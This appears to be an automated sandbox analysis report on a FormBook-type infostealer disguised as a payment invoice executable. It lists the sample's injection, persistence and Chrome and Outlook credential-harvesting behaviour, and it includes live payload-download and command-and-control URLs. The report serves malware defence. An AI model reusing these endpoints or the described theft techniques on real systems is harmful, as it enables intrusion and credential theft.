          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: Payment INV NO. 230203-1USD.exe, 00000006.00000002.375644051.0000000001077000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\AVG\Antivirus\AVGUI.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.00000000026C8000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q(C:\Program Files\AVG\Antivirus\AVGUI.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.00000000026C8000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.342255308.0000000006090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Windows Management Instrumentation          		12
          Registry Run Keys / Startup Folder          		612
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		41
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts12
          Registry Run Keys / Startup Folder          		1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer15
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          System Network Configuration Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 813147 Sample: Payment INV NO. 230203-1USD.exe Startdate: 22/02/2023 Architecture: WINDOWS Score: 100 50 www.justicepeacefamily.com 2->50 52 td-ccm-168-233.wixdns.net 2->52 54 gcdn0.wixdns.net 2->54 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 Multi AV Scanner detection for submitted file 2->86 88 4 other signatures 2->88 10 Payment INV NO. 230203-1USD.exe 15 4 2->10         started        signatures3 process4 dnsIp5 62 cdn.discordapp.com 162.159.135.233, 443, 49704 CLOUDFLARENETUS United States 10->62 48 C:\...\Payment INV NO. 230203-1USD.exe.log, ASCII 10->48 dropped 102 Injects a PE file into a foreign processes 10->102 15 Payment INV NO. 230203-1USD.exe 10->15         started        18 cmd.exe 3 10->18         started        21 Payment INV NO. 230203-1USD.exe 10->21         started        file6 signatures7 process8 file9 104 Modifies the context of a thread in another process (thread injection) 15->104 106 Maps a DLL or memory area into another process 15->106 108 Sample uses process hollowing technique 15->108 110 Queues an APC in another process (thread injection) 15->110 23 explorer.exe 5 1 15->23 injected 44 C:\Users\...\Payment INV NO. 230203-1USD.exe, PE32 18->44 dropped 46 Payment INV NO. 23...exe:Zone.Identifier, ASCII 18->46 dropped 112 Drops PE files to the startup folder 18->112 27 conhost.exe 18->27         started        29 conhost.exe 18->29         started        signatures10 process11 dnsIp12 56 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 23->56 58 lokoua.com 83.229.19.64, 49716, 49717, 80 SKYVISIONGB United Kingdom 23->58 60 5 other IPs or domains 23->60 90 System process connects to network (likely due to code injection or exploit) 23->90 92 Performs DNS queries to domains with low reputation 23->92 94 Uses ipconfig to lookup or modify the Windows network settings 23->94 31 ipconfig.exe 13 23->31         started        35 Payment INV NO. 230203-1USD.exe 2 23->35         started        37 ipconfig.exe 23->37         started        39 autofmt.exe 23->39         started        signatures13 process14 dnsIp15 64 www.cutgang.net 31->64 66 cutgang.net 31->66 72 Tries to steal Mail credentials (via file / registry access) 31->72 74 Tries to harvest and steal browser information (history, passwords, etc) 31->74 76 Modifies the context of a thread in another process (thread injection) 31->76 78 Maps a DLL or memory area into another process 31->78 68 162.159.129.233, 443, 49705 CLOUDFLARENETUS United States 35->68 70 cdn.discordapp.com 35->70 80 Injects a PE file into a foreign processes 35->80 41 Payment INV NO. 230203-1USD.exe 35->41         started        signatures16 process17 signatures18 96 Modifies the context of a thread in another process (thread injection) 41->96 98 Maps a DLL or memory area into another process 41->98 100 Sample uses process hollowing technique 41->100

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment INV NO. 230203-1USD.exe5%ReversingLabsByteCode-MSIL.Trojan.NjRAT
          Payment INV NO. 230203-1USD.exe7%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe5%ReversingLabsByteCode-MSIL.Trojan.NjRAT

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          td-ccm-168-233.wixdns.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.krankenzusatz.net0%Avira URL Cloudsafe
          http://www.johnnsprague.com0%Avira URL Cloudsafe
          http://www.nonport.live/c4mw/0%Avira URL Cloudsafe
          http://www.lokoua.comwww.lokoua.com0%Avira URL Cloudsafe
          http://www.2463.orgwww.2463.org100%Avira URL Cloudmalware
          http://www.transformertabletable.com/c4mw/100%Avira URL Cloudmalware
          http://www.cutgang.netwww.cutgang.net0%Avira URL Cloudsafe
          http://www.lokoua.com/c4mw/0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud/c4mw/100%Avira URL Cloudphishing
          http://www.nonport.live0%Avira URL Cloudsafe
          http://www.lokoua.com0%Avira URL Cloudsafe
          http://www.krankenzusatz.net/c4mw/0%Avira URL Cloudsafe
          http://www.edgeonetest-14.topwww.edgeonetest-14.top0%Avira URL Cloudsafe
          http://www.idszua.com0%Avira URL Cloudsafe
          http://www.cmproutdoors.com0%Avira URL Cloudsafe
          http://www.dylnov.ruwww.dylnov.ru100%Avira URL Cloudmalware
          http://www.justicepeacefamily.com/c4mw/0%Avira URL Cloudsafe
          http://www.toporsche.online/c4mw/100%Avira URL Cloudmalware
          http://www.justicepeacefamily.comwww.justicepeacefamily.com0%Avira URL Cloudsafe
          http://www.cutgang.net/c4mw/0%Avira URL Cloudsafe
          http://www.krankenzusatz.netwww.krankenzusatz.net0%Avira URL Cloudsafe
          http://www.idszua.comwww.idszua.com0%Avira URL Cloudsafe
          http://www.2463.org100%Avira URL Cloudmalware
          http://www.fantastica.org.ukwww.fantastica.org.uk0%Avira URL Cloudsafe
          http://www.transformertabletable.comwww.transformertabletable.com100%Avira URL Cloudmalware
          http://www.nonport.livewww.nonport.live0%Avira URL Cloudsafe
          http://www.johnnsprague.comwww.johnnsprague.com0%Avira URL Cloudsafe
          http://www.chernenko.xyz/c4mw/0%Avira URL Cloudsafe
          http://www.cutgang.net/c4mw/?qF=hJ8nKRQ&Zq2=6BIvgwiNOe2S0DuRsljq4E4r8c4sx43MlqhhkJ7Wy2eBZ63a4DEc7ZSN0%Avira URL Cloudsafe
          http://www.2463.org/c4mw/100%Avira URL Cloudmalware
          http://www.lokoua.com/c4mw/?Zq2=vLbIJTjaxi6VX2N+/Nw9CZTUcQ26TCmrvgrmgSoK7uvpnCbJI4wuwNhEzhrO+jOdriENsB2e9KNKFJNLYQWdyqDzg75x9Sdq9w==&qF=hJ8nKRQ0%Avira URL Cloudsafe
          http://www.chernenko.xyz0%Avira URL Cloudsafe
          http://www.edgeonetest-14.top/c4mw/0%Avira URL Cloudsafe
          http://www.johnnsprague.com/c4mw/0%Avira URL Cloudsafe
          http://www.edgeonetest-14.top0%Avira URL Cloudsafe
          http://www.transformertabletable.com100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.toporsche.online100%Avira URL Cloudmalware
          http://www.cmproutdoors.comwww.cmproutdoors.com0%Avira URL Cloudsafe
          http://www.idszua.com/c4mw/0%Avira URL Cloudsafe
          http://www.fantastica.org.uk0%Avira URL Cloudsafe
          http://www.fantastica.org.uk/c4mw/0%Avira URL Cloudsafe
          http://www.cmproutdoors.com/c4mw/=M0%Avira URL Cloudsafe
          http://www.dylnov.ru100%Avira URL Cloudmalware
          http://www.justicepeacefamily.com0%Avira URL Cloudsafe
          http://www.genuineinsights.cloudwww.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.toporsche.online/c4mw/H100%Avira URL Cloudmalware
          http://www.nonport.live/c4mw/70%Avira URL Cloudsafe
          http://www.toporsche.onlinewww.toporsche.online100%Avira URL Cloudmalware
          http://www.cmproutdoors.com/c4mw/0%Avira URL Cloudsafe
          http://www.dylnov.ru/c4mw/100%Avira URL Cloudmalware
          http://www.chernenko.xyzwww.chernenko.xyz0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          td-ccm-168-233.wixdns.net
          		34.117.168.233
          		truefalseunknown
          cutgang.net
          		194.102.227.30
          		truetrue
            		unknown
            cdn.discordapp.com
            		162.159.135.233
            		truefalse
              		high
              lokoua.com
              		83.229.19.64
              		truetrue
                		unknown
                chernenko.xyz
                		20.216.185.237
                		truetrue
                  		unknown
                  www.idszua.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.cutgang.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.justicepeacefamily.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.lokoua.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.chernenko.xyz
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.lokoua.com/c4mw/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.lokoua.com/c4mw/?Zq2=vLbIJTjaxi6VX2N+/Nw9CZTUcQ26TCmrvgrmgSoK7uvpnCbJI4wuwNhEzhrO+jOdriENsB2e9KNKFJNLYQWdyqDzg75x9Sdq9w==&qF=hJ8nKRQtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.discordapp.com/attachments/1072614287295660156/1076965214899146822/702false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.lokoua.comwww.lokoua.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                		high
                                http://www.genuineinsights.cloud/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.nonport.live/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=2SD0--712.8.drfalse
                                  		high
                                  http://www.cutgang.netwww.cutgang.netexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://search.yahoo.com?fr=crmas_sfpfipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                    		high
                                    http://www.cutgang.netexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.transformertabletable.com/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.johnnsprague.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.2463.orgwww.2463.orgexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.krankenzusatz.netexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.nonport.liveexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.krankenzusatz.net/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lokoua.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.593471251.000000000D89A000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.justicepeacefamily.comwww.justicepeacefamily.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.idszua.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.toporsche.online/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.cmproutdoors.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.edgeonetest-14.topwww.edgeonetest-14.topexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dylnov.ruwww.dylnov.ruexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.toporsche.onlineexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.337016856.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.581807825.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.justicepeacefamily.com/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.idszua.comwww.idszua.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                          		high
                                          http://www.krankenzusatz.netwww.krankenzusatz.netexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cutgang.net/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.2463.orgexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.edgeonetest-14.topexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cutgang.net/c4mw/?qF=hJ8nKRQ&Zq2=6BIvgwiNOe2S0DuRsljq4E4r8c4sx43MlqhhkJ7Wy2eBZ63a4DEc7ZSNipconfig.exe, 00000008.00000002.582221249.00000000031F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fantastica.org.ukwww.fantastica.org.ukexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
